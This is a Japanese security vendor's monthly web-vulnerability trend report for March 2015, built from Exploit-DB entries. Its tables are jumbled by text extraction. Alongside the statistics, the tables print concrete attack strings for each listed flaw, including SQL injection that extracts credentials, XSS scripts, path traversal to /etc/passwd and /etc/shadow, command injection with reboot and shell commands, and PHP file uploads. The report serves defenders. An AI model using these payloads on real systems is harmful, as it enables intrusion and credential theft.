2015年03月EDB-Report ダウンロード

2015.03
EDB-Report
最新Web脆弱性トレンドレポート(2015.03)
2015.03.01~2015.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム
サマリー
2015年3月は、Exploit-DBの分析結果をみると、クロス・サイト・スクリプティング(Cross Site Scripting:XSS、以下XSS)の攻撃による脆弱性が最も多く報告されました。分析されたXSS攻撃は、難易度は易し
いレベルである反面、致命的な2次被害を引き起こす可能性があります。さらに、それらのXSS攻撃は、今月に最も多く報告されたOpen Source基盤のChamilo LMSにて発生可能なXSS攻撃であることに特に注
目する必要があります。したがって、当該ソフトウェアをご利用の管理者は、セキュリティパッチやセキュアコーディングなどを行い、XSS攻撃にさらされないように特別な注意を払わなければなりません。また、今月には、シス
テムのパスワードを狙うコマンド・インジェクション(Command Injection)の攻撃も報告されています。ハッカーがシステム上の重要ファイルを取得できた場合には、より簡単にシステムを奪取される恐れがあります。当該
脆弱性にさらされないように高いレベルのセキュリティを維持することを勧奨します。
1. 脆弱性別件数
脆弱性カテゴリ
クロス サイト スクリプティング
(Cross Site Scripting:XSS)
SQL インジェクション
(SQL Injection)
ローカルファイル挿入
(Local File Inclusion:LFI)
コマンドインジェクション
(Command Injection)
ファイルアップロード
(File Upload)
脆弱性別件数
21
件数
21
25
20
16
15
16
10
5
5
3
3
2
0
2
合計
47
危険度
件数
割合
早急対応要
16
34%
高
31
66%
中
0
0%
合計
47
100%
危険度別分類
2. 危険度別件数
0
16
早急対応要
高
中
31
3. 攻撃実行の難易度別件数
難易度
件数
割合
難
5
11%
中
5
11%
易
合計
37
79%
47
100%
攻撃実行の難易度別件数
5
5
難
中
易
37
4. 主なソフトウェア別脆弱性発生件数
ソフトウェア名
5
主なソフトウェア別脆弱性発生件数
件数
Chamilo
Joomla
pfSense
Fiyo
WordPress
GeniXCMS
Moodle
PHPMoAdmin
Wordpress
Bedita CMS
ProjectSend
Bester
Elastix
Codoforum
Codiad
WoltLab
Triton and Websense appliance modules V-Series
Citrix NetScaler
EMC M&R (Watch4Net)
Berta
9
6
6
5
3
3
2
1
1
1
1
1
1
1
1
1
1
1
1
1
合計
47
10
9
Chamilo
9
8
7
6
Joomla
6 6
pfSense
5
5
4
3
2
Fiyo
3 3
WordPress
2
1 1 1 1 1 1 1 1 1 1 1 1 1
GeniXCMS
1
0
Copyright 2015 Penta Security Systems Inc. All rights reserved
Moodle
PHPMoAdmin
Wordpress
Bedita CMS
ProjectSend
Bester
EDB-Report
最新Web脆弱性トレンドレポート(2015.03)
2015.03.01~2015.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
危険度分類基準
早急対応要:攻撃が成功した場合システムへ侵入可
高:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす
中:情報漏洩
攻撃実行難易度分類基準
難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得
するため、高度な攻撃コードを採用したパターン、知らされていない攻撃
コードを採用したパターンのいずれかに該当する
中:攻撃手法自体は難しくないが、迂回コードを採用したパターン
易:1回のリクエストで攻撃が成立するパターン、複数回トライするも、
既知の攻撃コードを採用したパターンのいずれかに該当する
** 5件以上発生した主なソフトウェア別脆弱性の詳細情報
EDB 番号
脆弱性カテゴリ
攻撃難易度
危険度
脆弱性名
ソフトウェア名
36435
36435
36435
36435
36435
36435
36435
36435
36435
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
XSS
易
易
易
易
易
易
易
易
易
高
高
高
高
高
高
高
高
高
Chamilo
Chamilo
Chamilo
Chamilo
Chamilo
Chamilo
Chamilo
Chamilo
Chamilo
36385
SQL Injection
易
高
36435
SQL Injection
難
早急対応要
Chamilo LMS 1.9.10 - agenda_list.php XSS 脆弱性
Chamilo LMS 1.9.10 - outbox.php XSS 脆弱性
Chamilo LMS 1.9.10 - student.php XSS 脆弱性
Chamilo LMS 1.9.10 - ajax_get_file_listing.php XSS 脆弱性
Chamilo LMS 1.9.10 - configure_extensions.php XSS 脆弱性
Chamilo LMS 1.9.10 - course_category.php XSS 脆弱性
Chamilo LMS 1.9.10 - session_edit.php XSS 脆弱性
Chamilo LMS 1.9.10 - system_status.php XSS 脆弱性
Chamilo LMS 1.9.10 - session_add.php XSS 脆弱性
Joomla Simple Photo Gallery v1.0 - index.php SQL Injection 脆弱
性
Joomla ECommerce-WD Plugin 1.2.5 - index.php SQL Injection 脆
弱性
36464
SQL Injection
難
早急対応要
Joomla Spider FAQ Component
- index.php SQL Injection 脆弱性
Joomla
36560
SQL Injection
中
早急対応要
Joomla
36561
SQL Injection
易
高
36563
36506
36506
36506
36506
36506
36506
36581
36581
36581
36581
36581
SQL Injection
XSS
XSS
XSS
XSS
XSS
LFI
SQL Injection
SQL Injection
SQL Injection
LFI
XSS
中
易
易
易
易
易
易
中
難
易
易
易
高
高
高
高
高
高
早急対応要
早急対応要
早急対応要
高
早急対応要
高
Joomla Gallery WD Component - index.php SQL Injection 脆弱性
Joomla Contact Form Maker 1.0.1 Component - index.php SQL
Injection 脆弱性
Joomla Gallery WD - index.php SQL Injection 脆弱性
pfSense 2.2 - status_captiveportal.php XSS 脆弱性
pfSense 2.2 - firewall_rules.php XSS 脆弱性
pfSense 2.2 - firewall_shaper.php XSS 脆弱性
pfSense 2.2 - services_unbound_acls.php XSS 脆弱性
pfSense 2.2 - diag_logs_filter.php XSS 脆弱性
pfSense 2.2 - system_firmware_restorefullbackup.php LFI 脆弱性
Fiyo CMS 2.0.1.8 - /fiyo/dapur/index.php SQL Injection 脆弱性
Fiyo CMS 2.0.1.8 - article_list.php SQL Injection 脆弱性
Fiyo CMS 2.0.1.8 - check_user.php SQL Injection 脆弱性
Fiyo CMS 2.0.1.8 - browse.php LFI 脆弱性
Fiyo CMS 2.0.1.8 - /fiyo/ XSS 脆弱性
Copyright 2015 Penta Security Systems Inc. All rights reserved
Joomla
Joomla
Joomla
Joomla
pfSense
pfSense
pfSense
pfSense
pfSense
pfSense
Fiyo
Fiyo
Fiyo
Fiyo
Fiyo
EDB-Report
最新Web脆弱性トレンドレポート(2015.03)
2015.03.01~2015.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2015-03-02
EDB番号
36251
脆弱性カテゴリ
Command
Injection
攻撃難易度
易
危険度
高
脆弱性名
PHPMoAdmin - moadmin.php
Command Injection 脆弱性
攻撃コード
対象プログラム
対象環境
PHPMoAdmin
PHPMoAdmin
/wp-admin/optionsgeneral.php?page=cp_calculated_fields_form&u=2 or
1=1&name=InsertText
WordPress
Calculated Fields
Form Wordpress
Plugin 1.0.10
/wp-content/themes/photocrati-Path-theme/ecommsizes.php?prod_id=2 or 1=1
Wordpress
Wordpress
Theme
Photocrati 4.x.x
POST /moadmin/moadmin.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
10.10; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.
9,*/*;q=0.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
object=1;system('id;ls -lha');exit
2015-03-02
36230
SQL Injection
易
Calculated Fields Form
Wordpress Plugin 1.0.10 早急対応要
options-general.php SQL
Injection 脆弱性
2015-03-03
36242
SQL Injection
易
早急対応要
2015-03-04
36265
XSS
易
高
Wordpress Theme Photocrati
4.x.x
Bedita CMS - saveMailGroups
XSS 脆弱性
POST /bedita3.5.0.corylus.2261e29/bedita/index.php/newsletter/sa
veMailGroups HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Bedita CMS
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
Bedita CMS
3.5.0
data[MailGroup][id]=&data[MailGroup][group_name]
=<script>alert(0)</script>
2015-03-06
36303
SQL Injection
易
2015-03-06
36306
SQL Injection
中
2015-03-07
36305
SQL Injection
中
2015-03-08
36374
File Upload
易
早急対応要
ProjectSend r561 - useredit.php SQL Injection 脆弱性
Bester v1.0.4 早急対応要 showprofile.php SQL Injection
脆弱性
Elastix v2.x 早急対応要 iridium_threed.php SQL
Injection 脆弱性
早急対応要 File Upload
ProjectSend
ProjectSend
r561
/showprofile.php?id=1' and 1=2 union select
1,concat(0x3a3a,0x557365723d,user(),0x202c204442
5f4e616d653d,database(),0x3a3a),3,4,5,6,7--
Bester
Bester v1.0.4
/a2billing/customer/iridium_threed.php?transactionID
=-1 and 1=benchmark(2000000,md5(1))
Elastix
Elastix v2.x
Wordpress
Wordpress
Plugin Reflex
Gallery 3.1.3
GeniXCMS
GeniXCMS
v0.0.1
GeniXCMS
GeniXCMS
v0.0.1
/projectsend/users-edit.php?id=2 or 1=1
POST /wordpress/wp-content/plugins/reflexgallery/admin/scripts/FileUploader/php.php?Year=201
5&Month=03 HTTP/1.1
Host:
Connection: Close
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=--------------------------7dd10029908f2
-----------------------------7dd10029908f2
Content-Disposition: form-data; name="Filedata";
filename="php.php"
Content-Type: application/octet-stream
<? phpinfo(); ?>
-----------------------------7dd10029908f2-/index.php?page=1' union all select 1,2,(select
concat(unhex(hex(cast(user.userid as
char))),0x3a,unhex(hex(cast(user.pass as char))))
from `genixcms`.user limit 0,1) ,4,5,6,7,8,9,10 and
'j'='j
POST /genixcms/gxadmin/login.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
2015-03-10
36321
SQL Injection
難
早急対応要
GeniXCMS v0.0.1 - index.php
SQL Injection 脆弱性
2015-03-10
36321
SQL Injection
難
早急対応要
GeniXCMS v0.0.1 - login.php
SQL Injection 脆弱性
2015-03-10
36321
XSS
易
高
GeniXCMS v0.0.1 - index.php
XSS 脆弱性
/index.php?page=1<script>confirm("ZSL")</script>'
GeniXCMS
GeniXCMS
v0.0.1
2015-03-10
36320
LFI
易
高
Codoforum v2.5.1 - index.php /index.php?u=serve/attachment&path=../../../../../sit
LFI 脆弱性
es/default/config.php
Codoforum
Codoforum
v2.5.1
2015-03-12
36371
LFI
易
高
Codiad v2.5.3 - LFI 脆弱性
Codiad
Codiad v2.5.3
password=1&username=' and(select 1 from(select
count(*),concat((select (select (select
concat(unhex(hex(cast(user.userid as
char))),0x3a,unhex(hex(cast(user.pass as char))))
from `genixcms`.user limit 0,1) ) from
`information_schema`.tables limit
0,1),floor(rand(0)*2))x from
`information_schema`.tables group by x)a) and
'1'='1&login=
/i/197156553/components/filemanager/download.php
?path=../../../../../../../../../../../etc/passwd&type=un
defined
Copyright 2015 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2015.03)
2015.03.01~2015.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2015-03-13
EDB番号
36368
脆弱性カテゴリ
XSS
攻撃難易度
易
危険度
脆弱性名
攻撃コード
POST
/7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad
7553c0f885e3ccb60edbc0b6512d9eed HTTP/1.1
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
対象プログラム
対象環境
WoltLab
WoltLab
Community
Gallery v2.0
高
WoltLab Community Gallery
v2.0 - index.php - XSS 脆弱性
WordPress
WordPress
WPML v3.1.9
Joomla
Joomla Simple
Photo Gallery
v1.0
Moodle
Moodle
v2.5.9/v2.6.8/v
2.7.5/v2.8.3
Moodle
Moodle
v2.5.9/v2.6.8/v
2.7.5/v2.8.3
[title]=<script>alert('XSS')</script>
2015-03-16
36414
XSS
易
高
WordPress WPML v3.1.9 - XSS /?icl_action=reminder_popup&target=javascript:alert(
脆弱性
/XSS/);//
2015-03-16
36385
SQL Injection
易
高
Joomla Simple Photo Gallery
/index.php?option=com_simplephotogallery&view=im
v1.0 - index.php SQL Injection
ages&albumid=2 or 1=1
脆弱性
2015-03-17
2015-03-17
36418
36418
XSS
XSS
易
易
高
POST /my/index.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Moodle
Chrome/16.0.912.75 Safari/535.7
v2.5.9/v2.6.8/v2.7.5/v2.8.3 Accept: */*
index.php 脆弱性
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
config_title=" onmouseover=prompt("XSS") >
POST /blog/index.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
高
Moodle
v2.5.9/v2.6.8/v2.7.5/v2.8.3
/appmng/servlet/CommandLineServlet?type=exec&uu
id=asdfasdf&module=na1&command=ping&Destinatio
n=127.0.0.1'|cat%20/etc/shadow'
Triton and
Websense
appliance
modules VSeries
Triton v7.8.3
and Websense
appliance
modules VSeries v7.7
title=ZSL"><script>alert("XSS");</script>
易
高
Triton v7.8.3 and Websense
appliance modules V-Series
v7.7 - Command Injection 脆
弱性
2015-03-18
36423
Command
Injection
2015-03-19
36435
XSS
易
高
Chamilo LMS 1.9.10 agenda_list.php XSS 脆弱性
/main/calendar/agenda_list.php?type=personal%27%
20onmouseover=%27confirm%280%29%27/%3E%3
C!--
Chamilo
Chamilo LMS
1.9.10
2015-03-19
36435
XSS
易
高
Chamilo LMS 1.9.10 outbox.php XSS 脆弱性
/main/messages/outbox.php?f=social"+onmouseover
="confirm(0)
Chamilo
Chamilo LMS
1.9.10
2015-03-19
36435
XSS
易
高
Chamilo LMS 1.9.10 student.php XSS 脆弱性
/main/mySpace/student.php?keyword=31337"+onmo
useover=confirm(0)//&active=0&_qf__search_user=&
submit=Search
Chamilo
Chamilo LMS
1.9.10
Chamilo LMS 1.9.10 ajax_get_file_listing.php XSS
脆弱性
/main/inc/lib/fckeditor/editor/plugins/ajaxfilemanager/
ajax_get_file_listing.php?editor=stand_alone&view=th
umbnail&search=1&search_name=admin&search_rec
ursively=0&search_mtime_from=&search_mtime_to=
&search_folder=;</script><script>confirm(0)</script
>
Chamilo
Chamilo LMS
1.9.10
/main/admin/configure_extensions.php?display=</scr
ipt><script>confirm(0)</script>
Chamilo
Chamilo LMS
1.9.10
/main/admin/course_category.php?action=add&categ
ory="/><script>confirm(0)</script>
Chamilo
Chamilo LMS
1.9.10
/main/admin/session_edit.php?page=resume_session.
php%22%20onmouseover=confirm%280%29
Chamilo
Chamilo LMS
1.9.10
Chamilo
Chamilo LMS
1.9.10
Chamilo
Chamilo LMS
1.9.10
2015-03-19
36435
XSS
易
高
2015-03-19
36435
XSS
易
高
2015-03-19
36435
XSS
易
高
2015-03-19
36435
XSS
易
高
2015-03-19
36435
XSS
易
高
2015-03-19
36435
XSS
易
高
Chamilo LMS 1.9.10 configure_extensions.php XSS
脆弱性
Chamilo LMS 1.9.10 course_category.php XSS 脆弱
性
Chamilo LMS 1.9.10 session_edit.php XSS 脆弱性
GET
/main/admin/system_status.php?section=webserver
Chamilo LMS 1.9.10 HTTP/1.1
system_status.php XSS 脆弱性
Host:
User-Agent: <script>confirm(0)</script>
POST /main/admin/session_add.php HTTP/1.1
Host:
Connection: Close
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.2; WOW64; Trident/6.0)
Chamilo LMS 1.9.10 Content-Type:application/x-www-form-urlencoded
session_add.php XSS 脆弱性
formSent=1&name=<script>confirm(0)</script>&coa
ch_username=rehan&session_category=0&nb_days_a
cess_before=0&nb_days_acess_after=0&start_limit=o
n&day_start=2&month_start=3&year_start=2015&en
d_limit=on&day_end=2&month_end=3&year_end=20
16&session_visibility=2
Copyright 2015 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2015.03)
2015.03.01~2015.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難易度
危険度
脆弱性名
攻撃コード
対象プログラム
対象環境
Joomla
Joomla
ECommerce-WD
Plugin 1.2.5
Citrix NetScaler
Citrix NetScaler
SDX svm-10.550-1.9
EMC M&R
(Watch4Net)
EMC M&R
(Watch4Net)
prior v6.5u1
Joomla
Joomla Spider
FAQ Component
POST
/index.php?option=com_ecommercewd&controller=pr
oducts&task=displayproducts HTTP/1.1
Host:
Connection: Close
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.2; WOW64; Trident/6.0)
Content-Type:application/x-www-form-urlencoded
2015-03-19
2015-03-19
36435
36442
SQL Injection
Command
Injection
難
易
Joomla ECommerce-WD
早急対応要 Plugin 1.2.5 - index.php SQL
Injection 脆弱性
高
Citrix NetScaler SDX svm10.5-50-1.9 - Command
Injection 脆弱性
product_id=&product_count=&product_parameters_js
on=&search_name=&search_category_id=1)
AND (SELECT 5158 FROM(SELECT
COUNT(*),CONCAT(0x71786a6b71,(SELECT
(ELT(5158=5158,1))),0x71706a6a71,FLOOR(RAND(0)
*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP
BY x)a) AND
(8257=8257&filter_filters_opened=1&filter_manufactu
rer_ids=1&filter_price_from=&filter_price_to=&filter_
date_added_range=0&filter_minimum_rating=0&filter
_tags=&arrangement=thumbs&sort_by=&sort_order=
asc&pagination_limit_start=0&pagination_limit=12
POST /nitro/v1/config/xen_hotfix HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
object={"params"%3a{"action"%3a"start"}%2c"xen_
hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]}
2015-03-19
36440
LFI
易
高
EMC M&R (Watch4Net) prior
v6.5u1
/devicediscovery/devicesource/downloadSeedFile?fileFileNam
e=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows
\System32\drivers\etc\hosts
/index.php?option=com_gallery_wd&view=gallerybox
&image_id=19&gallery_id=2&theme_id=1%20AND%
Joomla Spider FAQ
20(SELECT%206173%20FROM(SELECT%20COUNT(*)
早急対応要 Component - index.php SQL ,CONCAT(0x716b627871,(MID((IFNULL(CAST(databa
Injection 脆弱性
se()%20AS%20CHAR),0x20)),1,50)),0x716a6a7171,F
LOOR(RAND(0)*2))x%20FROM%20INFORMATION_SC
HEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
2015-03-22
36464
SQL Injection
難
2015-03-26
36506
XSS
易
高
pfSense 2.2 status_captiveportal.php XSS
脆弱性
/status_captiveportal.php?zone=%27%22%3E%3Cscr
ipt%3Ealert%28%27ImmuniWeb%27%29;%3C/script
%3E
pfSense
pfSense 2.2
2015-03-26
36506
XSS
易
高
pfSense 2.2 firewall_rules.php XSS 脆弱性
/firewall_rules.php?undodrag=1&dragtable=&if=%27
%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%2
7%29;%3C/script%3E
pfSense
pfSense 2.2
2015-03-26
36506
XSS
易
高
/firewall_shaper.php?interface=wan&action=add&que
pfSense 2.2 ue=%27%22%3E%3Cscript%3Ealert%28%27Immuni
firewall_shaper.php XSS 脆弱性
Web%27%29;%3C/script%3E
pfSense
pfSense 2.2
2015-03-26
36506
XSS
易
高
pfSense
pfSense 2.2
2015-03-26
36506
XSS
易
高
pfSense
pfSense 2.2
2015-03-26
36506
LFI
易
pfSense
pfSense 2.2
2015-03-27
36520
File Upload
易
Berta
Berta CMS
pfSense 2.2 services_unbound_acls.php
XSS 脆弱性
pfSense 2.2 diag_logs_filter.php XSS 脆弱
性
/services_unbound_acls.php?act=edit&id=%27%22%
3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;
%3C/script%3E
/diag_logs_filter.php?filterlogentries_submit=1&filterlo
gentries_time=%27%22%3E%3Cscript%3Ealert%28
%27ImmuniWeb%27%29;%3C/script%3E
pfSense 2.2 /system_firmware_restorefullbackup.php?deletefile=..
早急対応要 system_firmware_restorefullb
/etc/passwd
ackup.php LFI 脆弱性
POST
/engine/upload.php?entry=true&mediafolder=.all
HTTP/1.1
Host:
Connection: Close
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.2; WOW64; Trident/6.0)
Berta CMS upload.php File
Content-Type: multipart/form-data; boundary=------早急対応要
Upload 脆弱性
--------------------7dd10029908f2
-----------------------------7dd10029908f2
Content-Disposition: form-data; name="Filedata";
filename="c.php"
Content-Type: application/octet-stream
<? phpinfo(); ?>
-----------------------------7dd10029908f2--
Copyright 2015 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2015.03)
2015.03.01~2015.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難易度
2015-03-30
36560
SQL Injection
中
2015-03-30
36561
SQL Injection
易
2015-03-30
36563
SQL Injection
中
2015-03-31
36581
SQL Injection
中
2015-03-31
36581
SQL Injection
難
2015-03-31
36581
SQL Injection
易
危険度
脆弱性名
Joomla Gallery WD
早急対応要 Component - index.php SQL
Injection 脆弱性
攻撃コード
対象プログラム
対象環境
/index.php?option=com_gallery_wd&view=gallerybox
&image_id=19&gallery_id=2&theme_id=1%20AND%
20(SELECT%206173%20FROM(SELECT%20COUNT(*)
,CONCAT(0x716b627871,(MID((IFNULL(CAST(databa
se()%20AS%20CHAR),0x20)),1,50)),0x716a6a7171,F
LOOR(RAND(0)*2))x%20FROM%20INFORMATION_SC
HEMA.CHARACTER_SETS%20GROUP%20B/Y%20x)a)
Joomla
Joomla Gallery
WD Component
/index.php?option=com_contactformmaker&view=con
tactformmaker&id=1%20and%201=1
Joomla
Joomla Contact
Form Maker
1.0.1
Component
Joomla
Joomla Contact
Form Maker
1.0.1
Component
Fiyo
Fiyo CMS
2.0.1.8
Fiyo
Fiyo CMS
2.0.1.8
Fiyo
Fiyo CMS
2.0.1.8
Fiyo
Fiyo CMS
2.0.1.8
Fiyo
Fiyo CMS
2.0.1.8
高
Joomla Contact Form Maker
1.0.1 Component - index.php
SQL Injection 脆弱性
高
/index.php?option=com_gallery_wd&view=gallerybox
&image_id=19&gallery_id=2&theme_id=1%20AND%
20(SELECT%206173%20FROM(SELECT%20COUNT(*)
Joomla Gallery WD ,CONCAT(0x716b627871,(MID((IFNULL(CAST(databa
index.php SQL Injection 脆弱性
se()%20AS%20CHAR),0x20)),1,50)),0x716a6a7171,F
LOOR(RAND(0)*2))x%20FROM%20INFORMATION_SC
HEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
Fiyo CMS 2.0.1.8 早急対応要 /fiyo/dapur/index.php SQL
Injection 脆弱性
/fiyo/dapur/index.php?app=user&act=edit&id=1%20U
NION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x
7171676471,0x66457070464452786c58,0x716a7674
71),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/fiyo/dapur/apps/app_article/controller/article_list.php
?cat=%27%20AND%20(SELECT%204352%20FROM(
SELECT%20COUNT(*),CONCAT(0x71666f7671,(SELE
CT%20(CASE%20WHEN%20(4352=4352)%20THEN
%201%20ELSE%200%20END)),0x7164687671,FLOO
R(RAND(0)*2))x%20FROM%20INFORMATION_SCHE
Fiyo CMS 2.0.1.8 MA.CHARACTER_SETS%20GROUP%20BY%20x)a)%2
早急対応要 article_list.php SQL Injection
0AND%20%27yeEe%27=%27yeEe&user=%27%20U
脆弱性
NION%20ALL%20SELECT%20NULL,CONCAT(0x71666
f7671,0x4652577247546e6b5241,0x7164687671),NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&level='
AND
6567=BENCHMARK(5000000,MD5(0x57586864))
AND 'hMLH'='hMLH
POST
/fiyo/dapur/apps/app_user/controller/check_user.php
HTTP/1.1
Host:
Connection: Close
Fiyo CMS 2.0.1.8 Accept: text/html, application/xhtml+xml, */*
高
check_user.php SQL Injection Accept-Language: ko-KR
脆弱性
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.2; WOW64; Trident/6.0)
Content-Type:application/x-www-form-urlencoded
2015-03-31
36581
LFI
易
早急対応要
2015-03-31
36581
XSS
易
高
Fiyo CMS 2.0.1.8 browse.php LFI 脆弱性
Fiyo CMS 2.0.1.8 - /fiyo/ XSS
脆弱性
act=email&[email protected]' AND SLEEP(5)
AND 'UjqT'='UjqT
POST
/fiyo//plugins/plg_kcfinder/browse.php?type=files&lng
=en&act=download HTTP/1.1
Host:
Connection: Close
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.2; WOW64; Trident/6.0)
Content-Type:application/x-www-form-urlencoded
dir=files&file=../../../../../../../etc/passwd
/fiyo/?app=article&view=item31ab2"><script>alert(1
)</script>0ccba&id=186
Copyright 2015 Penta Security Systems Inc. All rights reserved